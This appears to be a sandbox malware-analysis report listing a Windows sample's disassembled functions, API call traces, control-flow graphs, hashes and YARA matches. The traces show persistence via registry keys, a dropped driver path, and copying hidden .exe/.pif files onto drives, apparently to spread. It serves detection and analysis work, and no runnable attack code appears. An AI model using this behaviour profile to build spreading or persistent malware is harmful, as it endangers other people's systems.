                                    • LoadLibraryExA.KERNEL32(SHELL32.DLL,00000000,00000000), ref: 043101F4
                                    • GetProcAddress.KERNEL32(00000000,ShellExecuteA), ref: 04310202
                                    • CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 0431022F
                                    • GetLastError.KERNEL32(00000000), ref: 04310236
                                    • Sleep.KERNEL32(000927C0), ref: 04310245
                                    • ExitProcess.KERNEL32(00000000), ref: 0431024D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3828792979.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_4310000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CreateFile$ErrorLibraryLoadMappingSleep$AddressExitLastModeModuleMutexNameProcProcessThreadView
                                    • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns0$open$purity_control_90833
                                    • API String ID: 3272623439-1416619028
                                    • Opcode ID: dbd64ccf7f153d6efd02278d69ed607a589e6c63cd6bb6e2f3a2f8675ae537a0
                                    • Instruction ID: 716e995299af744e93c273467c9d9220bd3c0ebdafb576e135b6276ede66dc0c
                                    • Opcode Fuzzy Hash: dbd64ccf7f153d6efd02278d69ed607a589e6c63cd6bb6e2f3a2f8675ae537a0
                                    • Instruction Fuzzy Hash: 7B617D71640288ABEF18DFA0CD89FEA3778EF04B05F441415EE09BE5F0D6B566848B1A
                                    Function 0242BE89 Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 227filememorystringCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000003,00000000,00000000,?), ref: 0242BF11
                                    • GlobalAlloc.KERNEL32(00000040,-00001000), ref: 0242BF39
                                    • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0242BF5A
                                    • lstrlen.KERNEL32(024A3F70,?), ref: 0242BF74
                                    • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0242C022
                                    • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0242C040
                                    • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0242C055
                                    • SetEndOfFile.KERNEL32(000000FF), ref: 0242C062
                                    • CloseHandle.KERNEL32(000000FF), ref: 0242C06F
                                    • GlobalFree.KERNEL32(00000000), ref: 0242C096
                                    • DeleteFileA.KERNEL32(00000000), ref: 0242C0A0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$GlobalPointer$AllocCloseCreateDeleteFreeHandleReadWritelstrlen
                                    • String ID: D
                                    • API String ID: 3500512911-2746444292
                                    • Opcode ID: 3bad142e7eb5ca40472468dd25ec9f8167496b241c97dcfa47fef069e4d15534
                                    • Instruction ID: 81bbf02096b20261d55a440e544a9cafabaf3b943961a2967cd0acec578fd1ac
                                    • Opcode Fuzzy Hash: 3bad142e7eb5ca40472468dd25ec9f8167496b241c97dcfa47fef069e4d15534
                                    • Instruction Fuzzy Hash: EEA181B1944228EFDB24CF94DC8DBEEBB75AB48305F1085C9E60DA7280D7B59A84CF54
                                    Function 02421792 Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 214stringregistryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 834 2421792-2421806 call 2433600 837 2421808 834->837 838 242180d-242185b lstrcpy GetUserNameA call 2432ceb lstrlen 834->838 839 2421aec-2421af1 837->839 842 2421870-242187a 838->842 843 242185d-242186a lstrcat 838->843 844 242188b-242189e lstrlen 842->844 843->842 845 24218a0-24218e4 lstrlen 844->845 846 24218e6-2421940 lstrlen wsprintfA RegOpenKeyExA 844->846 845->844 848 2421942-242195d RegCreateKeyA 846->848 849 2421964-2421986 846->849 848->849 850 242195f 848->850 852 2421adf-2421ae6 RegCloseKey 849->852 853 242198c-24219d1 wsprintfA 849->853 850->839 852->839 854 2421a81-2421a88 853->854 855 24219d7-24219dd 853->855 863 2421a8a-2421aab RegSetValueExA 854->863 864 2421aad-2421ad4 lstrlen RegSetValueExA 854->864 856 2421a33-2421a5a call 24216fd lstrcpy 855->856 857 24219e4-24219ef 855->857 858 24219f4-2421a02 855->858 859 2421a04-2421a12 855->859 860 2421a14-2421a23 855->860 861 2421a25-2421a31 855->861 862 2421a5c-2421a7b call 24216fd lstrcpy 855->862 856->854 857->854 858->854 859->854 860->854 861->854 862->854 867 2421ada 863->867 864->867
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,Software\), ref: 02421819
                                    • GetUserNameA.ADVAPI32(00000000,?), ref: 0242182D
                                    • lstrlen.KERNEL32(?), ref: 02421852
                                    • lstrcat.KERNEL32(?,024A3CBC), ref: 0242186A
                                    • lstrlen.KERNEL32(?), ref: 02421892
                                    • lstrlen.KERNEL32(?), ref: 024218D7
                                    • lstrlen.KERNEL32(?,\%d,?), ref: 02421907
                                    • wsprintfA.USER32 ref: 02421915
                                    • RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,?), ref: 02421938
                                    • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 02421955
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$CreateNameOpenUserlstrcatlstrcpywsprintf
                                    • String ID: Software\$\%d
                                    • API String ID: 939812716-407207646
                                    • Opcode ID: e1a86435bad209b9cb4c13e03760ec1964d53a10415a8ed11b7f5ed22a88e6a9
                                    • Instruction ID: a4300abf62c83e8e1a8cc36021ed29b735cdea08d6db745fd5706abfa0d9b1cc
                                    • Opcode Fuzzy Hash: e1a86435bad209b9cb4c13e03760ec1964d53a10415a8ed11b7f5ed22a88e6a9
                                    • Instruction Fuzzy Hash: D991A075D44128AFCB2CCF55CC85BEABB75AB58301F0045D9E70DA6241D7719AC9CFA0
                                    Function 024253B2 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 166libraryloadersleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1003 24253b2-24253bf 1004 24253c1-24253cc Sleep 1003->1004 1005 24253ce-24253d3 Sleep 1003->1005 1006 24253d9-2425406 call 24243ec * 2 1004->1006 1005->1006 1010 242540b-2425422 LoadLibraryA 1006->1010 1011 24255fa-24255fc RtlExitUserThread 1010->1011 1012 2425428-2425444 GetProcAddress 1010->1012 1015 2425602 1011->1015 1013 2425446 1012->1013 1014 242544b-2425468 GetProcAddress 1012->1014 1016 242546a 1014->1016 1017 242546f-242548c GetProcAddress 1014->1017 1015->1011 1018 2425493-24254af GetProcAddress 1017->1018 1019 242548e 1017->1019 1020 24254b1 1018->1020 1021 24254b6-24254d3 GetProcAddress 1018->1021 1022 24254d5 1021->1022 1023 24254da-24254f7 GetProcAddress 1021->1023 1024 24254f9 1023->1024 1025 24254fe-242551a GetProcAddress 1023->1025 1026 2425521-242553e GetProcAddress 1025->1026 1027 242551c 1025->1027 1028 2425540 1026->1028 1029 2425545-2425582 call 24247bf CreateThread call 24210e5 LoadLibraryA 1026->1029 1028->1015 1029->1011 1034 2425584-24255a0 GetProcAddress 1029->1034 1034->1011 1035 24255a2-24255a9 call 2424649 1034->1035 1038 24255c4-24255cb call 2424649 1035->1038 1039 24255ab-24255c1 call 2424595 call 242470f 1035->1039 1038->1011 1044 24255cd-24255d4 call 2424bd0 1038->1044 1039->1038 1044->1011 1049 24255d6-24255f7 CreateThread call 24210e5 1044->1049 1049->1011
                                    APIs
                                    • Sleep.KERNEL32(0001D4C0), ref: 024253C6
                                    • Sleep.KERNEL32(00001000), ref: 024253D3
                                    • LoadLibraryA.KERNEL32(024A4114), ref: 02425415
                                    • GetProcAddress.KERNEL32(00000000,024A4124), ref: 02425432
                                    • GetProcAddress.KERNEL32(00000000,024A4134), ref: 02425456
                                    • GetProcAddress.KERNEL32(00000000,024A4144), ref: 0242547A
                                    • RtlExitUserThread.NTDLL(00000000), ref: 024255FC
                                    Strings
                                    • C:\Windows\system32\drivers\llkhhn.sys, xrefs: 024255B0
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$Sleep$ExitLibraryLoadThreadUser
                                    • String ID: C:\Windows\system32\drivers\llkhhn.sys
                                    • API String ID: 3711489173-4146516600
                                    • Opcode ID: 1e26d27dfa6093c3cd97d070d3c715e7ee16b100d6c89ddf95959a49ef771ae9
                                    • Instruction ID: 844858903b3293a14db58285b8af4f89231c80d03f51a9b9b9711304b5cf9a10
                                    • Opcode Fuzzy Hash: 1e26d27dfa6093c3cd97d070d3c715e7ee16b100d6c89ddf95959a49ef771ae9
                                    • Instruction Fuzzy Hash: 1A5174B5E84310EFD71CDFA6E949B5A3B79B708701F90491AF10E97280D7B455A8CF11
                                    Function 0242E507 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 123sleeplibrarythreadCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • Sleep.KERNEL32(00000400), ref: 0242E550
                                    • lstrcpy.KERNEL32(00000000,024A4068), ref: 0242E565
                                    • LoadLibraryA.KERNEL32(00000000), ref: 0242E57C
                                    • GetProcAddress.KERNEL32(00000000,024A4054), ref: 0242E59E
                                    • FreeLibrary.KERNEL32(00000000), ref: 0242E5B9
                                    • lstrcat.KERNEL32(00000000,024A3C08), ref: 0242E5CC
                                    • LoadLibraryA.KERNEL32(00000000), ref: 0242E5D9
                                    • GetProcAddress.KERNEL32(00000000,024A4054), ref: 0242E5FB
                                    • CreateThread.KERNEL32(00000000,00000000,0242DD99,00000000,00000000,00000000), ref: 0242E61E
                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000CC39,00000000,00000000,?), ref: 0242E645
                                    • Sleep.KERNEL32(00000400), ref: 0242E659
                                    • Sleep.KERNEL32(00000400), ref: 0242E67F
                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000CA87,0000005A,00000000,?), ref: 0242E6AB
                                    • Sleep.KERNEL32(00000400), ref: 0242E6C1
                                    • Sleep.KERNEL32(000DBBA0), ref: 0242E6E8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep$CreateLibraryThread$AddressLoadProc$Freelstrcatlstrcpy
                                    • String ID: Z
                                    • API String ID: 4104366077-1505515367
                                    • Opcode ID: 8cb68b06d7faf4616a26fcc7d9ad6c247129bd831a724e6d871b48c594d34c86
                                    • Instruction ID: 866794b28aef1dd90be56b9ada64793ba5a8136714c4542c4743a4b984b2cfd3
                                    • Opcode Fuzzy Hash: 8cb68b06d7faf4616a26fcc7d9ad6c247129bd831a724e6d871b48c594d34c86
                                    • Instruction Fuzzy Hash: 9641A275E80364EBE7159B91ED49FD97B38BB08702F40889AF309A6180D7F069D8CF55
                                    Function 0242ED35 Relevance: 21.2, APIs: 14, Instructions: 197threadsleepnetworkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • SetErrorMode.KERNEL32(00008002), ref: 0242ED52
                                    • WSAStartup.WS2_32(00000002,?), ref: 0242ED61
                                    • RtlInitializeCriticalSection.NTDLL(02434030), ref: 0242ED6C
                                    • RtlInitializeCriticalSection.NTDLL(02434018), ref: 0242ED77
                                    • RtlInitializeCriticalSection.NTDLL(02434050), ref: 0242ED82
                                      • Part of subcall function 0242E6F0: LoadLibraryA.KERNEL32(024A3AAC), ref: 0242E766
                                      • Part of subcall function 0242E6F0: GetProcAddress.KERNEL32(00000000,024A40E0), ref: 0242E789
                                      • Part of subcall function 0242E6F0: GetProcAddress.KERNEL32(00000000,024A40F4), ref: 0242E7A1
                                      • Part of subcall function 0242E6F0: GetProcAddress.KERNEL32(00000000,024A4104), ref: 0242E7BA
                                      • Part of subcall function 0242E6F0: LoadLibraryA.KERNEL32(024A41E8), ref: 0242E7CC
                                      • Part of subcall function 0242E6F0: GetProcAddress.KERNEL32(00000000,024A422C), ref: 0242E7EF
                                      • Part of subcall function 0242E6F0: GetProcAddress.KERNEL32(00000000,024A4204), ref: 0242E808
                                      • Part of subcall function 0242E6F0: GetProcAddress.KERNEL32(00000000,024A4218), ref: 0242E820
                                      • Part of subcall function 0242E6F0: GetProcAddress.KERNEL32(00000000,024A41F4), ref: 0242E839
                                      • Part of subcall function 0242E6F0: RegOpenKeyExA.KERNEL32(80000001,024A3B2C,00000000,000F003F,00000000), ref: 0242E85E
                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000D570,00000000,00000000,00000000), ref: 0242EDA5
                                      • Part of subcall function 024210E5: RtlEnterCriticalSection.NTDLL(02434030), ref: 024210F5
                                      • Part of subcall function 024210E5: RtlLeaveCriticalSection.NTDLL(02434030), ref: 0242117F
                                    • CreateThread.KERNEL32(00000000,00000000,Function_000053B2,00000000,00000000,?), ref: 0242EDCC
                                      • Part of subcall function 024210E5: CloseHandle.KERNEL32(00000000), ref: 02421166
                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000E507,00000000,00000000,?), ref: 0242EDF3
                                    • CreateThread.KERNEL32(00000000,00000000,Function_00003FAA,00000000,00000000,?), ref: 0242EE1A
                                    • CreateThread.KERNEL32(00000000,00000000,Function_000057A0,00000000,00000000,?), ref: 0242EE41
                                      • Part of subcall function 0242F030: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00008000,024A3A34), ref: 0242F067
                                      • Part of subcall function 0242F030: MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00008000,?,0242232C), ref: 0242F08E
                                    • CreateThread.KERNEL32(00000000,00000000,Function_00001189,00000000,00000000,?), ref: 0242EF9E
                                    • CreateThread.KERNEL32(00000000,00000000,Function_00003911,00000000,00000000,?), ref: 0242EFC5
                                    • CreateThread.KERNEL32(00000000,00000000,Function_00003D9B,00000000,00000000,?), ref: 0242EFEC
                                    • Sleep.KERNEL32(00000200), ref: 0242F009
                                      • Part of subcall function 02427C71: MapViewOfFile.KERNEL32(00000264,00000006,00000000,00000000,00015400), ref: 02427CA8
                                      • Part of subcall function 02427C71: UnmapViewOfFile.KERNEL32(?), ref: 02427CD7
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Create$Thread$AddressProc$CriticalSection$File$InitializeView$LibraryLoad$CloseEnterErrorHandleLeaveMappingModeOpenSleepStartupUnmap
                                    • String ID:
                                    • API String ID: 4160894954-0
                                    • Opcode ID: 91de2f2cf497d97d12923f8c8040510db72119a67f343618f27c573da73b853f
                                    • Instruction ID: a17f9a61a7e64aebaa1af6f538d4708c8017d0a8a35d257cc251abd1e3c6869b
                                    • Opcode Fuzzy Hash: 91de2f2cf497d97d12923f8c8040510db72119a67f343618f27c573da73b853f
                                    • Instruction Fuzzy Hash: 07717F71B85324BBFB249B92DC57FE97735AB05B01F904499B2097A1C0DBF02A88CF56
                                    Function 0242DFC7 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 133filestringtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNEL32(00004E20), ref: 0242DF9F
                                    • GetLogicalDrives.KERNEL32 ref: 0242DFAF
                                    • GetDriveTypeA.KERNEL32(?), ref: 0242E032
                                    • lstrcat.KERNEL32(?,024A4094), ref: 0242E058
                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 0242E074
                                    • GetFileTime.KERNEL32(000000FF,?,?,?), ref: 0242E0A9
                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0242E0BD
                                    • ReadFile.KERNEL32(?,?,00000FA0,?,00000000), ref: 0242E11F
                                    • CharLowerA.USER32(?), ref: 0242E12C
                                    • lstrlen.KERNEL32(?), ref: 0242E139
                                    • Sleep.KERNEL32(00001B58), ref: 0242E4C8
                                      • Part of subcall function 024242C7: tolower.MSVCRT ref: 0242431E
                                      • Part of subcall function 024242C7: tolower.MSVCRT ref: 02424330
                                    • lstrcpy.KERNEL32(?,00000000), ref: 0242E207
                                    • GetFileAttributesA.KERNEL32(?), ref: 0242E214
                                    • CloseHandle.KERNEL32(?), ref: 0242E226
                                    • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 0242E242
                                    • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 0242E275
                                    • CloseHandle.KERNEL32(000000FF), ref: 0242E282
                                    • SetFileAttributesA.KERNEL32(?,00000007), ref: 0242E291
                                    • CloseHandle.KERNEL32(000000FF), ref: 0242E2AA
                                    • GetFileAttributesA.KERNEL32(?), ref: 0242E2B7
                                    • SetFileAttributesA.KERNEL32(?,00000020), ref: 0242E2D5
                                    • DeleteFileA.KERNEL32(?), ref: 0242E2E2
                                    • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 0242E30D
                                    • GetSystemTime.KERNEL32(?), ref: 0242E32D
                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 0242E357
                                    • lstrcat.KERNEL32(?,.pif), ref: 0242E3BA
                                    • lstrcat.KERNEL32(?,.exe), ref: 0242E3CE
                                    • lstrlen.KERNEL32(?,?,00000000), ref: 0242E3FA
                                    • WriteFile.KERNEL32(?,?,00000000), ref: 0242E40F
                                    • SetFileTime.KERNEL32(?,?,?,?), ref: 0242E431
                                    • CloseHandle.KERNEL32(?), ref: 0242E43E
                                    • SetFileAttributesA.KERNEL32(?,00000007), ref: 0242E44D
                                    • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 0242E469
                                    • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 0242E49C
                                    • CloseHandle.KERNEL32(000000FF), ref: 0242E4A9
                                    • SetFileAttributesA.KERNEL32(?,00000007), ref: 0242E4B8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Time$Attributes$CloseHandle$Create$SystemWritelstrcat$Sleeplstrlentolower$CharDeleteDriveDrivesLogicalLowerReadTypelstrcpy
                                    • String ID: :$\
                                    • API String ID: 3206639923-1166558509
                                    • Opcode ID: fafc667a422538db9139811e729995ca526f7d1c984bb6bdbd5a7021a29ccf45
                                    • Instruction ID: 63c9bac53267d6b8e37a3483f14ced9a5c5e07f9b348aa099c1c6a373df783ab
                                    • Opcode Fuzzy Hash: fafc667a422538db9139811e729995ca526f7d1c984bb6bdbd5a7021a29ccf45
                                    • Instruction Fuzzy Hash: 7751B171E04278CBDB29CB55CC84BEEB775BF85304F0485D9E109EA280D774AAA9CF50
                                    Function 004C5C8F Relevance: 15.1, APIs: 10, Instructions: 99memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlEnterCriticalSection.NTDLL(00614318), ref: 004C5C9E
                                    • GlobalAlloc.KERNEL32(00002002,00000000,005BDEE8,?,006142FC,006142FC,004C602A,00000000,00000100,004C5A7D,004C5377,004C1DA3,00000100,004C1D3C,005BDEE8,?), ref: 004C5CF3
                                    • GlobalHandle.KERNEL32(00878470), ref: 004C5CFC
                                    • GlobalUnWire.KERNEL32(00000000), ref: 004C5D05
                                    • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 004C5D17
                                    • GlobalHandle.KERNEL32(00878470), ref: 004C5D2E
                                    • GlobalFix.KERNEL32(00000000), ref: 004C5D35
                                    • RtlLeaveCriticalSection.NTDLL(005BDEE8), ref: 004C5D3B
                                    • GlobalFix.KERNEL32(?), ref: 004C5D4A
                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 004C5D93
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Global$CriticalSection$AllocHandleLeave$EnterWire
                                    • String ID:
                                    • API String ID: 1877740037-0
                                    • Opcode ID: 2a4b0ff6ab52184df33346680fe272799f895be663629ec97a8ab2f38e8cb45a
                                    • Instruction ID: adc354c87ccd6dec8d05e629d6f73dcb18915d44c13c705d9f83c47dac1d4f55
                                    • Opcode Fuzzy Hash: 2a4b0ff6ab52184df33346680fe272799f895be663629ec97a8ab2f38e8cb45a
                                    • Instruction Fuzzy Hash: 10318D79604B069FD7649F28DC89E2AB7E9FB44305B004A3EF893C3661E775F8458B18
                                    Function 0242C5AE Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 130registrystringsleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 0242C651
                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0242C673
                                    • RegEnumValueA.KERNEL32(?,00000000,?,000000FF,00000000,00000000,?,000000FF), ref: 0242C6ED
                                    • RegCloseKey.ADVAPI32(?), ref: 0242C781
                                      • Part of subcall function 024242C7: tolower.MSVCRT ref: 0242431E
                                      • Part of subcall function 024242C7: tolower.MSVCRT ref: 02424330
                                    • lstrlen.KERNEL32(?), ref: 0242C71D
                                    • lstrlen.KERNEL32(00000000), ref: 0242C729
                                    • Sleep.KERNEL32(00000400), ref: 0242C76B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlentolower$CloseEnumOpenSleepValuewsprintf
                                    • String ID: %s%s
                                    • API String ID: 3307273590-3252725368
                                    • Opcode ID: 29f9b2012f66493367776c4d4165d87584150bf4e535ccfd08bf0548737d08a4
                                    • Instruction ID: afc20d2ad44f37c279ebea2a388a5908b54f884ff2e6a1876d2e25c0581a6471
                                    • Opcode Fuzzy Hash: 29f9b2012f66493367776c4d4165d87584150bf4e535ccfd08bf0548737d08a4
                                    • Instruction Fuzzy Hash: 1A517571D40219AFDB24CF94DC98BEEBBB4FB48704F4046DAE509A7280D7799A48CF90
